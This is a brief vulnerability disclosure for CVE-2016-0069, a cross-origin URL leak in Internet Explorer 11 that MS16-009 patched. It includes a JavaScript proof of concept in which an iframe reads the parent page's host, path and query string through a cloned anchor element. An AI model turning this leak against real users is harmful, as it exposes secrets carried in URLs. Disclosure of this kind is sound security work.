CVE-2016-0069 Cross origin URL information leakage of Internet Explorer

Cross origin URL information leakage of IE was fixed by MS16-009. (JVN#78383854: Internet Explorer cross-domain policy bypass)

Reported
2015-09-18
Confirmed version
Internet Explorer 11.0.9600.18036
Description
A cross origin content in the iframe child can retrieve part of the url of parent page of iframe. Secret strings in the url may be leaked to the child page of iframe.
PoC
         var elm = document.createElement( "a" );
         elm.href = "#";
         elm = elm.cloneNode( false );
         alert( elm.protocol ); // protocol scheme of parent page
         alert( elm.host );     // hostname with port number of parent page
         alert( elm.hostname ); // hostname of parent page
         alert( elm.port );     // port number of parent page
         alert( elm.pathname ); // path name of parent page
         alert( elm.search );   // query string of parent page